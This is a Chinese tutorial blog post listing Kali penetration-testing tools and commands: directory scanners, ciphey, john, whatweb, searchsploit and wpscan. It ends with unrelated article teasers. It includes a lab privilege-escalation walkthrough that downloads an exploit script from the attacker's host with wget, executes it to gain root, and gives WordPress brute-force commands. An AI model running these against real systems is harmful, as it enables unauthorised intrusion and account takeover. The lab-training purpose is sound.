常用网安渗透工具及命令(扫目录、解密爆破、漏洞信息搜索)

目录

dirsearch:

dirmap:

输入目标

文件读取

ciphey(很强的一个自动解密工具):

john(破解密码):

whatweb指纹识别:

searchsploit:

例1:

例2:

例3(DC-3靶场的提权例子):

wpscan

常用参数

wpscan扫描


感觉扫目录dirmap>dirsearch>御剑,我工具都是按在kali上的,命令也是在kali上使用

dirsearch:

kali下载:

git clone https://github.com/maurosoria/dirsearch.git

忘了要不要先下载python3,不过都学网安了,没下早晚也要下:

sudo apt install python3

常用参数:

  • -w--wordlist: 指定要使用的字典文件路径,用于构建扫描路径。可以使用自定义的字典文件。
  • -r--recursive: 启用递归扫描,递归地扫描子目录。
  • -t--threads: 指定线程数量,控制请求速率。
  • -x--exclude-status: 指定要排除的HTTP状态码,用逗号分隔。例如:301,403。默认情况下,不会排除任何状态码。
  • -b--cookie: 指定请求中要包含的Cookie。
  • -H--header: 指定请求中要包含的其他标头,用冒号分隔键值对。例如:User-Agent:Mozilla/5.0
  • -a--user-agent: 指定请求中的用户代理标头。
  • --random-agent: 在每个请求中使用随机的用户代理标头。
  • --delay 5:表示每个请求之间延迟5秒。

例1:

dirsearch -u 192.168.120.132 -e * -i 200

只显示状态码200

-i 状态码 #只显示该状态码

-x 状态码 #不显示该状态码

-e * 表示指定要搜索的文件扩展名。在这里使用通配符 * 表示搜索所有类型的文件

例2:

dirsearch.py -u http://example.com -r --delay 5      #递归扫描,每五秒发送一次

例3:

dirsearch -u http://xxxx -r -t 30         #30个线程扫描扫描

例4:

dirsearch -u http://xxxx -r -t 30 --proxy 127.0.0.1:8080        #代理扫

dirmap:

输入目标

单目标,默认为http

python3 dirmap.py -i https://target.com -lcf
python3 dirmap.py -i 192.168.1.1 -lcf

子网(CIDR格式)

python3 dirmap.py -i 192.168.1.0/24 -lcf

网络范围

python3 dirmap.py -i 192.168.1.1-192.168.1.100 -lcf

文件读取

python3 dirmap.py -iF targets.txt -lcf

结果保存:

  1. 结果将自动保存在项目根目录下的output文件夹中

  2. 每一个目标生成一个txt,命名格式为目标域名.txt

  3. 结果自动去重复,不用担心产生大量冗余

ciphey(很强的一个自动解密工具):

Ciphey - 自动解密工具 ,下载:https://github.com/ciphey/ciphey

kali下载(如果不成功检查一下有没有下python3和pip):

apt install python3-ciphey

cipher是一种使用智能人工智能的自动解密工具和自然语言处理。输入加密文本,获取解密文本

基本用法: 
ciphey -t "aGVsbG8gbXkgbmFtZSBpcyBiZWU="

参数选项:

  -t, --text TEXT            您想要解密的密文。-q, --quiet                减少冗长的显示,直接给结果-g, --greppable            只输出答案(对于grep很有用)-v, --verbose-C, --checker TEXT         使用给定的检查器-c, --config TEXT          使用给定的配置文件。默认为appdirs.user_config_dir('ciphey','ciphey')/'config.yml'
​-w, --wordlist TEXT        使用给定的密码字典-p, --param TEXT           将参数传递给语言检查器-l, --list-params BOOLEAN  列出所选模块的参数--searcher TEXT            选择要使用的搜索算法-b, --bytes                强制密码使用二进制模式作为输入--default-dist TEXT        设置默认的字符/字节分布-m, --module PATH          从给定路径添加模块-A, --appdirs              输出密码到想要的文件位置
​-f, --file FILENAME--help                     显示此帮助消息并退出。

john(破解密码):

先在桌面创建一个文件,将上面的hash密码复制进去并保存,接着使用john指向该文件

john /root/桌面/passwd 

img

密码是snoopy

-incremental :使用遍历模式,就是使用字幕数字等组合密码的所有可能情况,一般不用,太浪费时间。如果你电脑速度够快又有足够的时间,可以来使用这种方式,这是威力最大的方式。

whatweb指纹识别:

kali自带,基本语法:
whatweb -v 192.168.183.147

searchsploit:

是一款kali自带的搜索漏洞信息的模块

   -c, --case     [Term]      区分大小写(默认不区分大小写)-e, --exact    [Term]      对exploit标题进行EXACT匹配 (默认为 AND) [Implies "-t"].-h, --help                 显示帮助-j, --json     [Term]      以JSON格式显示结果-m, --mirror   [EDB-ID]    把一个exp拷贝到当前工作目录,参数后加目标id-o, --overflow [Term]      Exploit标题被允许溢出其列-p, --path     [EDB-ID]    显示漏洞利用的完整路径(如果可能,还将路径复制到剪贴板),后面跟漏洞ID号-t, --title    [Term]      仅仅搜索漏洞标题(默认是标题和文件的路径)-u, --update               检查并安装任何exploitdb软件包更新(deb或git)-w, --www      [Term]      显示Exploit-DB.com的URL而不是本地路径(在线搜索)-x, --examine  [EDB-ID]    使用$ PAGER检查(副本)Exp--colour               搜索结果不高亮显示关键词--id                   显示EDB-ID--nmap     [file.xml]  使用服务版本检查Nmap XML输出中的所有结果(例如:nmap -sV -oX file.xml)使用“-v”(详细)来尝试更多的组合--exclude="term"       从结果中删除值。通过使用“|”分隔多个值例如--exclude=“term1 | term2 | term3”。

例1:

searchsploit joomla 3.7.0

当前cms存在SQL注入的漏洞,还有跨站扫描漏洞,我们看一下SQL注入的,该漏洞的完整path是

/usr/share/exploitdb/exploits/php/webapps/42033.txt

拷贝漏洞的详细信息到桌面,cp 要拷贝的文件 拷贝后的文件

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt /root/桌面/42033.txt

在桌面打开该文件

给出了注入点

例2:

找到4.4.x的漏洞 后面对应Privilege Escalation(提权)

searchsploit Ubuntu 16.04

找到对应版本号后面的路径,然后直接查看漏洞路径

searchsploit -p 39772.txt

┌──(kali㉿kali)-[~]
└─$ searchsploit -p 39772.txtExploit: Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege EscalationURL: https://www.exploit-db.com/exploits/39772Path: /usr/share/exploitdb/exploits/linux/local/39772.txtCodes: CVE-2016-4557, 823603

复制到桌面:

cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali/桌面/39772.txt

打开桌面上的39772.txt文件,最后一行附上了exp链接

物理机访问最后一行网址,下载exp解压后是一个叫39772的文件,把文件拖进虚拟机桌面上

例3(DC-3靶场的提权例子):

可以用exim4提权,先查看exim4版本

    exim4 --version

和上一个靶场一样,这里可以使用searchsploit

    searchsploit exim 4

出来的结果很多,我们使用46996.sh

"Local Privilege E"表示本地特权升级漏洞;"Remote Command Ex"表示远程命令执行漏洞;"Denial of Service"表示拒绝服务漏洞等等

先打开Apache服务:

    systemctl start apache2.service

把脚本复制到html下

     cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html

Charles用户那边用 wget命令下载这个脚本

    charles@dc-4:/$ wget http://192.168.233.130/46996.sh

但是下载失败,转去/tmp目录下下载

    cd /tmp

    wget http://192.168.233.130/46996.sh

ls -l查看脚本权限,发现没有执行权限,我们需要给脚本加执行权限

    chmod +x 46996.sh

执行脚本:

    ./46996.sh

 然后whoami发现已经为root

具体的DC-3靶场下载及wp:https://blog.csdn.net/2301_76690905/article/details/135050091

wpscan

该扫描器可以实现获取Wordpress站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。

常用参数
–update 更新到最新版本
–url | -u 要扫描的WordPress站点.
–force | -f 不检查网站运行的是不是WordPress
–enumerate | -e [option(s)] 枚举
wpscan扫描
1、扫描WordPress漏洞、版本、ip等信息
wpscan --url http://www.xxxxx.top/
2、扫描枚举wordpress用户
wpscan --url http://www.xxxxx.top/ --enumerate u
3、扫描主题
wpscan --url http://www.xxxxx.top/ --enumerate t
4、扫描插件漏洞
wpscan --urlhttp://www.xxxxx.top/ --enumerate p
5、使用WPScan进行暴力破解在进行暴力破解攻击之前,我们需要创建对应的字典文件。输入下列命令:
wpscan --url https://www.xxxxx.top/-e u --wordlist /root/桌面/password.txt
6、暴力破解用户密码
wpscan --url dc-2 user.txt -P passwd.txt
7、wpscan --ignore-main-redirect --url 192.168.1.8 --enumerate u --force
  • --ignore-main-redirect:该参数可用于忽略网站中可能存在的主要的页面重定向,以确保扫描结果的准确性。

  • --url:该参数用于指定要扫描的 WordPress 网站的 URL 地址。在本例中,扫描的目标是位于本地网络中的地址为 "192.168.1.8" 的 WordPress 网站。

  • --enumerate u:该参数用于枚举所有的 WordPress 用户,以便查看是否存在弱密码或其他安全风险。

  • --force:该参数用于在可能存在风险的情况下,仍然尝试对目标进行攻击和渗透测试。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/229648.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Git----学习Git第一步基于 Windows 10 系统和 CentOS7 系统安装 Git

查看原文 文章目录 基于 Windows 10 系统安装 Git 客户端基于 CentOS7 系统安装部署 Git 基于 Windows 10 系统安装 Git 客户端 (1)打开 git官网 ,点击【windows】 (2)根据自己的电脑选择安装,目前一般w…

【自顶向下看Java——深度剖析抽象类和接口】

系列文章目录 欢迎大家订阅《计算机底层原理》、《自顶向下看Java》专栏、能够帮助到大家就是对我最大的鼓励、我会持续为大家输出优质内容,敬请期待! 系列文章目录 文章目录 前言 一、抽象类 什么是抽象类? 为什么要使用抽象类? …

@Data@NoArgsConstructor@AllArgsConstructor 这几个常用注解什么意思?

这三个注解通常用于简化Java类的开发,特别是在使用一些框架时,如Lombok。让我们逐个解释这些注解的作用: 1. Data Data 是 Lombok 提供的一个组合注解,它包含了一组常用注解的功能,如 ToString、EqualsAndHashCode、…

一种解决Qt5发布release文件引发的无法定位程序输入点错误的方法

目录 本地环境问题描述分析解决方案 本地环境 本文将不会解释如何利用Qt5编译生成release类型的可执行文件以及如何利用windeployqt生成可执行的依赖库,请自行百度。 环境值操作系统Windows 10 专业版(22H2)Qt版本Qt 5.15.2Qt Creator版本5.0…

K8S的一个pod中运行多个容器

通过deployment的方式部署 创建一个deployment文件 [rootk8s-master1 pods]# cat app.yaml apiVersion: apps/v1 kind: Deployment metadata:name: dsfnamespace: applabels:app: dsf spec:replicas: 1selector:matchLabels:app: dsftemplate:metadata:labels:app: dsfspec:i…

P2P如何使用register_attention_control为UNet的CrossAttention关联AttentionStore

上次的调试到这里了,写完这篇接着看,prepare_latents_ddim_inverted 如何预计算 inversion latents: /home/pgao/yue/FateZero/video_diffusion/pipelines/p2p_ddim_spatial_temporal.py 1. 原始的UNet3D的CrossAttention和SparseCausalAtte…

深度学习中的潜在空间

1 潜在空间定义 Latent Space 潜在空间:Latent ,这个词的语义是“隐藏”的意思。“Latent Space 潜在空间”也可以理解为“隐藏的空间”。Latent Space 这一概念是十分重要的,它在“深度学习”领域中处于核心地位,即它是用来学习…

C#基础知识 - 操作数与运算符篇

C#基础知识 - 操作数与运算符篇 4.1 表达式 - 操作数与运算符组成4.1.2 C#中常见的表达式类型:4.1.2 表达式示例 更多C#基础知识详解请查看:C#基础知识 - 从入门到放弃 4.1 表达式 - 操作数与运算符组成 C#中,表达式(expression…

kafka入门(四):kafka生产者发送消息

创建生产者实例和构建消息之后,就可以开始发送消息了。 发送消息主要有三种模式:发后即忘、同步、异步。 发后即忘: 就是直接调用 生产者的 send方法发送。 发后即完,只管往 kafka中发送消息,而不关心消息是否正确…

用GitBook制作自己的网页版电子书

用GitBook制作自己的网页版电子书 前言 几年前阅读过其他人用GitBook创建的文档,可以直接在浏览器中打开,页面干净整洁,非常清爽,至今印象深刻。 GitBook非常适合用来为个人或团队制作文档,对于我这种偶尔写博客的人…

和鲸科技CEO范向伟受邀出席港航数据要素流通与生态合作研讨会,谈数据资产入表的战略机会

近日,由上海虹口数字航运创新中心、龙船(北京)科技有限公司(下简称“龙船科技”)、华东江苏大数据交易中心联合举办的“港航数据要素流通与生态合作研讨会”圆满落幕,来自港航领域的近百名企业代表共同参与…

【Spark面试】Spark面试题答案

目录 1、spark的有几种部署模式,每种模式特点?(☆☆☆☆☆) 2、Spark为什么比MapReduce块?(☆☆☆☆☆) 3、简单说一下hadoop和spark的shuffle相同和差异?(☆☆☆☆☆…

Spring Boot Docker Compose 支持中文文档

本文为官方文档直译版本。原文链接 Spring Boot Docker Compose 支持中文文档 引言服务连接自定义镜像跳过特定的容器使用特定Compose文件等待容器就绪控制 Docker Compose 的生命周期激活 Docker Compose 配置文件 引言 Docker Compose 是一种流行的技术,可用于为…

黑马头条--day02--2文章详情

一.上传之前的配置 1.上传js和css文件 在minio中创建leadnews桶, 在leadnews下面创建/plugins目录,在该目录下面分别创建js和css目录, 也就是/plugins/css和/plugins/js,向css中上传以下index.css: html {overflow-x: hidden; }#app {position: rel…

GPT实战系列-探究GPT等大模型的文本生成

GPT实战系列-探究GPT等LLM文本生成 GPT专栏文章: GPT实战系列-Baichuan2等大模型的计算精度与量化-CSDN博客 GPT实战系列-GPT训练的Pretraining,SFT,Reward Modeling,RLHF-CSDN博客 GPT实战系列-ChatGLM3本地部署CUDA111080Ti…

kali虚拟机无网络

1.查看虚拟机的网卡模式 在虚拟机设置里,一般选择桥接模式,也可以选择NAT模式。 2、你的IP地址是否写死了(设置为静态IP) vim编辑模式下的命令: 按a或i进入编辑模式,然后按esc键退出编辑模式,s…

LV.13 D5 uboot概述及SD卡启动盘制作 学习笔记

一、uboot概述 1.1 开发板启动过程 开发板上电后首先运行SOC内部iROM中固化的代码(BL0),这段代码先对基本的软硬件环境(时钟等...)进行初始化,然后再检测拨码开关位置获取启动方式,然后再将对应存储器中的uboot搬移到内存,然后跳…

如何在STM32上配置DMA通道

STM32系列微控制器具有DMA(Direct Memory Access)功能,它允许外设直接访问存储器,从而减轻CPU的负担。在本文中,我们将介绍如何在STM32上配置DMA通道。 Step 1: 选择DMA通道 STM32微控制器通常具有多个DMA通道&#x…

mysql复习笔记04(小滴课堂)

mysql的存储引擎介绍 基于表的。 查看数据库支持的引擎: 查看支持的版本: 查看表的引擎: 查看所有表的存储引擎: 也可以修改默认引擎。 这有一张数据量庞大的表。 表是通过执行shell脚本快速创建的. 创建的表. 执行成功后会有个s…

Flink系列之:集合操作

Flink系列之:集合操作 一、集合操作二、UNION三、INTERSECT四、EXCEPT五、IN六、EXISTS 一、集合操作 适用于流、批操作 二、UNION UNION 和 UNION ALL 返回两个表中的数据。 UNION 会去重,UNION ALL 不会去重。 Flink SQL> create view t1(s) as…